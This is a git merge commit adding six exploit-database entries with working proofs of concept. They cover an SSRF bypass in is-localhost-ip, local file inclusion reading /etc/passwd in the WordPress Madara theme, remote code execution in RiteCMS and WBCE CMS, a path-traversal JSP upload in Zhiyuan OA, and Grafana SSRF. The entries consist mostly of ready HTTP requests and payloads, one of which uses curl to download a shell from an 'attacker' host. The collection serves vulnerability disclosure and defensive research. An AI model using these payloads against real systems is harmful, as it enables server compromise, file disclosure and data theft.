Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/local/52496.txt

@@ -0,0 +1,217 @@
+# Titles: is-localhost-ip 2.0.0 - SSRF
+# Author: nu11secur1ty
+# Date: 11/09/2025
+# Vendor: https://github.com/tinovyatkin/is-localhost-ip
+# Software:
+https://github.com/tinovyatkin/is-localhost-ip/releases/tag/v2.0.0
+# Reference: https://portswigger.net/web-security/ssrf
+
+## Description:
+
+# SSRF PoC — Professional README
+
+**WARNING: This repository contains a proof‑of‑concept (PoC) demonstrating
+an SSRF / localhost canonicalization bypass.
+Run only on isolated, non-production machines (local VM, sandbox). Do NOT
+expose to the internet.**
+
+## Overview
+
+This PoC demonstrates how a naive server that blocks "localhost" by name
+can be bypassed using alternate IP encodings (hex, decimal, octal,
+IPv6-mapped). The included `index.js` is a **tested, minimal** Express app
+that:
+
+- Provides `/check-url?url=<URL>` which checks `is-localhost-ip(hostname)`
+and fetches the URL if allowed.
+- Provides `/secret` that returns a generated secret-style JSON object
+(used to prove leakage).
+- Includes a test harness to exercise multiple host encodings — **tests are
+disabled by default** and must be explicitly enabled with
+`ENABLE_SELF_TEST=1`.
+
+## Files included
+
+- `PoC.js` — the PoC server (safe by default: self-tests disabled unless
+enabled).
+- `package.json` — minimal package manifest.
+- `README.md` — this file.
+
+## Quick security summary (read before running)
+
+- **Do not** run this on machines that have access to production networks,
+secret stores, or sensitive services.
+- The PoC generates synthetic API keys at `/secret`. If a test succeeds, a
+generated key will be returned by `/check-url` — treat that as
+proof-of-concept and not a real secret, unless you wired it to a real
+system.
+- Prefer running inside an isolated VM with no network access to your
+corporate network; or a disposable container with blocked egress to RFC1918
+and loopback.
+
+## Requirements
+
+- Node.js **v18+** (for built-in `fetch`).
+- npm (comes with Node).
+
+## Setup
+
+```bash
+# create directory and extract the archive or clone this repo
+# inside the project directory:
+npm install
+```
+
+`package.json` in this archive will install:
+- `express`
+- `is-localhost-ip`
+- `ipaddr.js` (used by the safer checks in the index.js)
+
+## How to run (safe default)
+
+By default, the server will **not** run the self-tests. To start the server:
+
+```bash
+node PoC.js
+```
+
+You should see:
+```
+Express server running on http://localhost:3005
+Self-tests disabled (set ENABLE_SELF_TEST=1 to enable)
+```
+
+Then in another terminal:
+
+```bash
+curl "http://localhost:3005/check-url?url=https://example.com"
+```
+
+Expected: fetched content preview (if allowed).
+
+## How to run the internal tests (ONLY in an isolated environment)
+
+If you want to run the bypass tests to reproduce the PoC **locally and
+isolated**, enable them explicitly:
+
+```bash
+ENABLE_SELF_TEST=1 node PoC.js
+```
+
+The process will run a set of encoded-hostname tests against the local
+`/secret` endpoint and print a summary. If any variant returns `200` and
+the response includes `"apikey":`, that variant demonstrated a bypass in
+your environment.
+
+## How to disable the `/secret` endpoint (extra safety)
+
+If you want to remove the sensitive test endpoint entirely, edit `PoC.js`
+and remove or comment out the `/secret` route.
+
+## Safe patch summary (what this PoC does to be safer)
+
+- Resolves hostnames to IP addresses server-side using DNS and checks all
+addresses against ipaddr.js ranges (rejects
+loopback/private/link-local/reserved).
+- Rejects non-http(s) schemes, credentials in URL, and non-allowed ports.
+- Avoids following redirects when fetching upstream resources.
+- Disables automatic self-tests by default (opt-in).
+
+## Responsible disclosure template
+
+If you plan to report this behavior to a maintainer/vendor, use the
+template in the original analysis or contact the project privately with:
+- Node version, OS, `is-localhost-ip` version
+- Minimal PoC command and the exact payload(s) that worked
+- Logs showing the returned JSON that includes the generated `apikey`
+
+## License
+
+This PoC is provided for testing and defensive purposes only. Use at your
+own risk. No warranty.
+
+----------------------------------------------------------------
+
+STATUS: Medium
+
+
+[+]Payload + Exploit Burp Suite:
+
+```
+# normal 403 Forbidden
+GET /check-url?url=http://10.10.0.28:3005 HTTP/1.1
+Host: 10.10.0.28:3005
+Content-Len gth: 2
+Content-Length: 2
+
+
+HTTP/1.1 403 Forbidden
+X-Powered-By: Express
+Content-Type: application/json; charset=utf-8
+Content-Length: 33
+ETag: W/"21-6j4oICVQ6Z+6nx0WETDHqqeeklM"
+Date: Sun, 09 Nov 2025 09:29:34 GMT
+Connection: keep-alive
+Keep-Alive: timeout=5
+
+{"error":"localhost not allowed"}
+
+-----------------------------------------------------------------
+
+# Exploit
+GET /check-url?url=http://[::ffff:7f00:1]:3005 HTTP/1.1
+Host: 10.10.0.28:3005
+Content-Len gth: 2
+Content-Length: 2
+
+
+HTTP/1.1 200 OK
+X-Powered-By: Express
+Content-Type: text/html; charset=utf-8
+Content-Length: 306
+ETag: W/"132-0QnJdvy6r/DgvnNvBs+i8eLbOLc"
+Date: Sun, 09 Nov 2025 09:29:28 GMT
+Connection: keep-alive
+Keep-Alive: timeout=5
+
+{"message":"Express server running","usage":"GET /check-url?url=
+https://10.10.0.28:3005","examples":["GET /check-url?url=
+https://httpbin.org/json","GET /check-url?url=http://localhost:8080","GET
+/check-url?url=https://google.com"],"endpoints":["GET /","GET
+/check-url?url=<URL>","GET /secret"],"port":3005}
+
+```
+
+# Reproduce:
+[href](
+https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2025/CVE-2025-9960
+)
+
+# Demo:
+[href](https://www.patreon.com/posts/cve-2025-9960-is-143172786)
+
+# Time spent:
+03:15:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+home page: https://www.asc3t1c-nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.asc3t1c-nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>

exploits/multiple/webapps/52487.txt

@@ -0,0 +1,24 @@
+# Exploit Title: WordPress Madara Local File Inclusion
+# Date: November 1, 2025
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: WordPress Theme Madara
+# Software Link: WordPress Theme Madara
+# Tested on: [OS / PHP / WordPress versions used in testing — e.g., Ubuntu 22.04, PHP 8.1, WP 6.4]
+# CVE: CVE-2025-4524
+
+
+#Attack Vector
+body="/wp-content/plugins/madara/"
+
+#POC
+POST /wp-admin/admin-ajax.php HTTP/2
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 490
+
+action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail

exploits/multiple/webapps/52488.txt

@@ -0,0 +1,32 @@
+# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution
+# Date: 2025-10-26
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://github.com/handylulu/RiteCMS
+# Software Link:
+https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
+# Version: 3.1.0
+# Tested on: Windows XP
+
+
+## Vulnerability Description
+RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
+its content_function() handler: [function:...] tags in page content are
+evaluated, allowing a user with page-editing privileges to execute
+arbitrary PHP on the server.
+
+## Exploit Code
+Create or edit any page with the following content:
+
+[function:system('whoami')]
+
+
+## Steps to Reproduce
+1. Login as administrator
+2. Create new page or edit existing page
+3. Insert [function:system('whoami')] in content
+4. Save and view page
+5. Command output will be displayed
+
+## additional payloads
+[function:system('curl http://attacker/shell.php -o shell.php')]
+[function:system('id')]

exploits/multiple/webapps/52489.txt

@@ -0,0 +1,49 @@
+# Exploit Title: WBCE CMS 1.6.4 - Remote Code Execution
+# Date: 2024-10-26
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://wbce.org/
+# Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/v1.6.4
+# Version: 1.6.4
+# Tested on: Linux (Debian/Parrot OS)
+
+
+## Vulnerability Description
+WBCE CMS version 1.6.4 contains a critical remote code execution
+vulnerability in the Droplets module. Authenticated attackers with
+administrator privileges can inject and execute arbitrary PHP code, leading
+to complete system compromise.
+
+## Proof of Concept
+
+1. Log in to the WBCE admin panel with administrator credentials
+2. Navigate to "Admin-Tools" in the sidebar menu
+3. Click on "Droplets" to access the droplet management interface
+4. Click "Add droplet" to create a new droplet
+5. Enter a random name for the droplet and insert the following malicious
+code in the code area:
+
+
+echo "<h3>System Information PoC</h3>";
+echo "<pre>";
+
+if(function_exists('shell_exec')) {
+    echo "1. Current User: " . shell_exec('id');
+    echo "2. Working Directory: " . shell_exec('pwd');
+    echo "3. System Info: " . shell_exec('uname -a');
+    echo "4. PHP Version: " . phpversion();
+} else {
+    echo "shell_exec disabled - but eval() still works!";
+    echo "Current User (via PHP): " . get_current_user();
+    echo "System: " . PHP_OS;
+}
+
+echo "</pre>";
+
+
+6. Click "Save & Back" to store the droplet
+7. Copy the droplet code name (e.g., `[[test]]`) from the droplets list.
+You can find this under the description column by clicking the info icon.
+8. Edit or create any page and insert the droplet code name within double
+brackets
+9. View the page to observe the command execution output, confirming remote
+code execution

exploits/multiple/webapps/52490.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Zhiyuan OA  - arbitrary file upload leading
+# Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2"
+# Date: 1-11-2025
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: https://service.seeyon.com/
+# Software Link: [vendor download / product page if available]
+# Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck)
+# Tested on: MacOS
+# CVE: CVE-2025-34040
+
+Description:
+A path-traversal / improper validation in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or actor able to reach upload endpoint) to place crafted files outside the intended directories by controlling `realFileType` and `fileId` parameters. Under affected configurations, an uploaded JSP can be stored in the webroot and executed, yielding remote code execution.
+
+High-level reproduction template (redacted — non-actionable):
+POST request to `/seeyon/wpsAssistServlet` with multipart/form-data. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences leading to writes under webapp root. The uploaded file contents must be controlled to produce a server-side executable file (e.g., JSP) — DO NOT include such server-side code here.
+
+Impact:
+- Remote code execution if the uploaded file is accessible and executable.
+- Complete server compromise and pivoting to internal networks.
+- Data exfiltration, persistence, and further lateral movement.
+
+References:
+- NVD CVE-2025-34040 (NVD entry – awaiting enrichment)
+- VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload
+- CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627
+- Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html
+
+POC;
+POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
+Host:
+Content-Type: multipart/form-data; boundary=......
+Accept-Encoding: gzip
+
+--......
+Content-Disposition: form-data; name="upload"; filename="123.xls"
+Content-Type: application/vnd.ms-excel
+
+<% out.println("HelloWorld");%>
+--.......--

exploits/multiple/webapps/52491.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Grafana  11.6.0 - SSRF
+# FOFA: app="Grafana"
+# Date: 2-11-2025
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: https://grafana.com/
+# Software Link: https://grafana.com/grafana/download
+# Version: 11.2.0 - 11.6.0
+# CVE: CVE-2025-4123
+
+Description:
+An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.
+
+POC:
+GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
+Connection: close
+Accept-Encoding: gzip
+
+GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
+Connection: close
+Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
+Accept-Encoding: gzip